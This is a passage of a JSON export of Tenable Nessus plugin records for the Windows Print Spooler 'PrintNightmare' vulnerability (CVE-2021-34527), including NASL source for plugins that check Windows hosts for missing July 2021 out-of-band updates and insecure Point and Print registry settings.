privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004960: Windows Server 2012 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004960.NASL", "href": "https://www.tenable.com/plugins/nessus/151479", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151479);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004960\");\n script_xref(name:\"MSFT\", value:\"MS21-5004960\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004960: Windows Server 2012 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004960\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004960\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004960'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004960])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:32", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004951: Windows 7 and Windows Server 2008 R2 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004951.NASL", "href": "https://www.tenable.com/plugins/nessus/151476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151476);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004951\");\n script_xref(name:\"MSKB\", value:\"5004953\");\n script_xref(name:\"MSFT\", value:\"MS21-5004951\");\n script_xref(name:\"MSFT\", value:\"MS21-5004953\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004951: Windows 7 and Windows Server 2008 R2 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004951\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004951\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004951'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004951])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges. The remote system is not fully secure as the point and print registry settings contain an insecure configuration in one of the following locations/keys:\n\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\NoWarningNoElevationOnInstall\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\UpdatePromptSettings", "cvss3": {}, "published": "2021-07-09T00:00:00", "type": "nessus", "title": "Windows PrintNightmare Registry Exposure CVE-2021-34527 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-02-27T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/151488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151488);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/27\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004945\");\n script_xref(name:\"MSKB\", value:\"5004946\");\n script_xref(name:\"MSKB\", value:\"5004947\");\n script_xref(name:\"MSKB\", value:\"5004948\");\n script_xref(name:\"MSKB\", value:\"5004950\");\n script_xref(name:\"MSKB\", value:\"5004951\");\n script_xref(name:\"MSKB\", value:\"5004953\");\n script_xref(name:\"MSKB\", value:\"5004954\");\n script_xref(name:\"MSKB\", value:\"5004955\");\n script_xref(name:\"MSKB\", value:\"5004956\");\n script_xref(name:\"MSKB\", value:\"5004958\");\n script_xref(name:\"MSKB\", value:\"5004959\");\n script_xref(name:\"MSKB\", value:\"5004960\");\n script_xref(name:\"MSFT\", value:\"MS21-5004945\");\n script_xref(name:\"MSFT\", value:\"MS21-5004946\");\n script_xref(name:\"MSFT\", value:\"MS21-5004947\");\n script_xref(name:\"MSFT\", value:\"MS21-5004948\");\n script_xref(name:\"MSFT\", value:\"MS21-5004950\");\n script_xref(name:\"MSFT\", value:\"MS21-5004951\");\n script_xref(name:\"MSFT\", value:\"MS21-5004953\");\n script_xref(name:\"MSFT\", value:\"MS21-5004954\");\n script_xref(name:\"MSFT\", value:\"MS21-5004955\");\n script_xref(name:\"MSFT\", value:\"MS21-5004956\");\n script_xref(name:\"MSFT\", value:\"MS21-5004958\");\n script_xref(name:\"MSFT\", value:\"MS21-5004959\");\n script_xref(name:\"MSFT\", value:\"MS21-5004960\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"Windows PrintNightmare Registry Exposure CVE-2021-34527 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \n operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges. \n \n The remote system is not fully secure as the point and print registry settings contain an insecure configuration in \n one of the following locations/keys:\n\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\NoWarningNoElevationOnInstall\n - HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\UpdatePromptSettings\");\n # https://msrc-blog.microsoft.com/2021/07/08/clarified-guidance-for-cve-2021-34527-windows-print-spooler-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c80300b5\");\n # https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.Printing::PointAndPrint_Restrictions_Win7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2cdd3bd3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004946\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004947\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004948\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004951\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004953\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004956\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004958\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004959\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004960\");\n script_set_attribute(attribute:\"solution\", value:\n\"See Vendor Advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-07';\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar my_os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\nvar my_os_build = get_kb_item('SMB/WindowsVersionBuild');\nvar mitigated = TRUE; # by default: These registry keys do not exist by default, and therefore are already at the secure setting\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif(my_os == '10')\n{\n if( \n (my_os_build != '10240') && \n (my_os_build != '14393') && \n (my_os_build != '17763') && \n (my_os_build != '18363') && \n (my_os_build != '19041') && \n (my_os_build != '19042') && \n (my_os_build != '19043') \n ) exit(0, 'Windows version ' + my_os + ', build ' + my_os_build + ' is not affected.');\n}\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n## Check mitigation\nvar keys = make_list(\n 'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\NoWarningNoElevationOnInstall',\n 'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\UpdatePromptSettings');\n\nhotfix_check_fversion_init();\nregistry_init();\nvar hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nvar values = get_registry_values(handle:hklm, items:keys);\nRegCloseKey(handle:hklm);\n\nvar report = '\\n Nessus detected the following insecure registry key configuration:\\n';\n# MS: must confirm that the following registry settings are set to 0 (zero) or are not defined\n# if defined and empty we are exposed; so isNull over empty_or_null()\n# setup reporting\nforeach var key (keys)\n{\n if(!isnull(values[key]) && (values[key] != 0) )\n {\n report += ' - ' + key + ' is set to ' + values[key] + '\\n';\n mitigated = FALSE;\n }\n}\nhotfix_add_report(report);\n\n# if we don't have any patches or the registry is insecurely configured, alert.\nif(!mitigated)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004958.NASL", "href": "https://www.tenable.com/plugins/nessus/151477", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004954\");\n script_xref(name:\"MSKB\", value:\"5004958\");\n script_xref(name:\"MSFT\", value:\"MS21-5004954\");\n script_xref(name:\"MSFT\", value:\"MS21-5004958\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004958: Windows Server 2012 R2 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004958\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004958\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004958'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004958])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:21", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004948: Windows 10 1607 and Windows Server 2016 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004948.NASL", "href": "https://www.tenable.com/plugins/nessus/151474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151474);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004948\");\n script_xref(name:\"MSFT\", value:\"MS21-5004948\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004948: Windows 10 1607 and Windows Server 2016 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004948\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004948\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 